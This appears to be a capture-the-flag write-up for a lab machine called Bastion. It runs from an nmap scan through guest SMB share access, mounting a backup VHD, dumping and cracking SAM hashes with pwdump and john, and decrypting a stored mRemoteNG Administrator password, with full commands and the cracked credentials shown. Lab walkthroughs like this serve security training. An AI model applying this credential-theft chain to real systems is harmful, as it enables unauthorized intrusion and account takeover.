- Access an open SMB share to find a full Windows backup file
- Grab the SAM hases and crack the password
- mRemoteNG is install and the password is stored inside the configuration file
- Use credentials to SSH as Administrator
First start with an Nmap scan
# Nmap 7.70 scan initiated Wed May 22 14:41:53 2019: nmap -sV -sC -T4 10.10.10.134 Nmap scan report for 10.10.10.134 Host is up (0.038s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -46m34s, deviation: 1h09m15s, median: -6m36s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2019-05-22T20:35:28+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-05-22 14:35:27 |_ start_date: 2019-05-19 22:23:54 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed May 22 14:42:11 2019 -- 1 IP address (1 host up) scanned in 17.97 seconds
A few ports open. Lets take a look at SMB. Running a quick smbmap I will see that there is a Backups directory that I have READ, WRITE privileges to.
# smbmap -u invalid -H 10.10.10.134 [+] Finding open SMB ports.... [+] Guest SMB session established on 10.10.10.134... [+] IP: 10.10.10.134:445 Name: 10.10.10.134 Disk Permissions ---- ----------- ADMIN$ NO ACCESS Backups READ, WRITE C$ NO ACCESS IPC$ READ ONLY
Next thing I did was connect to the Backups share folder. Once connected I was able to see a few files but the ones that interested me were the notes.txt and WindowsImageBackup.
# smbclient -U none //10.10.10.134/Backups password Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Sep 17 17:48:51 2019 .. D 0 Tue Sep 17 17:48:51 2019 note.txt AR 116 Tue Apr 16 06:10:09 2019 rEFqURGnaS D 0 Tue Sep 17 17:48:51 2019 SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019 WindowsImageBackup D 0 Fri Feb 22 07:44:02 2019 ZWSfrgOAqs D 0 Tue Sep 17 17:42:12 2019 7735807 blocks of size 4096. 2757009 blocks available
The notes.txt file mentions that I dont need to donwload the entire Windows Backups image to our host machine.
smb: \> more note.txt Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Instead of wasting time and downloading the files from the share, I decided to mount it. Before I was able to mount it I had to install a few things
# sudo apt install nfs-common # sudo apt install cifs-utils # sudo apt install libguestfs-tools
Once all those were downloaded I was able to mount the drive
mount -t cifs //10.10.10.134/Backups /mnt/Bastion
If you look around the WindowsImageBackup directory the you should ifnd two .vhd files.
# ls 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd <output omitted>
To mount the .vhd files I used the tool guestmount.
# guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
After enumerating around the box I realized I wont find any flags at this time. Next step was to dump the hashes from the SAM file. The SAM file is located at Windows/System32/config but it can’t be access like any old file. To extract the hashes I will use a tool called pwdump.
# pwdump SYSTEM SAM Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Next I am going to use john to crack the hash. First I need to copy the hashes to a text file and the start john
# john --format=NT -w=/usr/share/wordlists/rockyou.txt hashes.txt Using default input encoding: UTF-8 Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status (Administrator) bureaulampje (L4mpje)
Now I have a password bureaulampje for the user L4mpje. I can use this to SSH in. From this point I can grab the user flag located at C:\Users\L4mpje\Desktop.
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:\Users\L4mpje\Desktop 22-02-2019 16:27 <DIR> . 22-02-2019 16:27 <DIR> .. 23-02-2019 10:07 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 11.292.332.032 bytes free
After doing some serious enumerating I was able to find that mRemoteNG is installed on the system. Some further enumeration revealed a XML configuration file located at C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml. Reading the XML file I noticed the username Administrator along with something that resembles a password hash.
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a -44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVq tKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP " PuttySession="Default Settings" Port="3389" ConnectToConsole="false"
Once you have everything ready I can now decrypt the hash.
# java -jar decipher mremoteng.jar aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== User input: aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== Use default password for cracking... Decrypted output: thXLHM96BeKL0ER2
Last I can use the decrypted password to log in as Administrator and grab the flag. You can find the root flag in C:\Users\Administrator\Desktop
administrator@BASTION C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:\Users\Administrator\Desktop 23-02-2019 10:40 <DIR> . 23-02-2019 10:40 <DIR> .. 23-02-2019 10:07 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 11.291.758.592 bytes free